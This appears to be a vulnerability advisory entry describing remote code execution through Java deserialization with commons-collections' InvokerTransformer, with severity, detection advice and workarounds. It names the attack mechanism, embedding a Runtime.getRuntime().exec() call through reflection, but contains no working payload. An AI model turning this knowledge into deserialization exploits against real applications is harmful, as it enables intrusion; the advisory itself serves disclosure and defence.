Severity
CVSS: 9.3
Description
Arbitrary remote code execution with InvokerTransformer.
Explanation
Due to the behavior of
InvokerTransformer
, an arbitrary code execution attack may be executed against any application performing deserialization of user supplied objects when commons-collections
is on the classpath.The intended behavior of InvokerTransformer
is to allow for the invocation of any method on the Java classpath. The InvokerTransformer
class implements Serializable
and therefore can be included in a serialized object. A combination of the InvokerTransformer's
intended functionality and because it is serializable allows an attacker to embed malicious content, such as Runtime.getRuntime().exec()
via Java reflection, allowing arbitrary code execution.
Detection
The application is vulnerable if it allows deserialization of untrusted data.
Recommendation
The project is actively working on a new release to address this issue. Upgrading to a non vulnerable version is not possible at this time. A potential workaround is to remove
commons-collections
from the classpath or to remove the InvokerTransformer
class from the common-collections
jar file.Note: This is not specifically a commons-collections
issue. Any serializable object that allows reflection (dynamic method invocation) or execution of dangerous functionality will be subject to the same exploit.
Categories
Data, Functional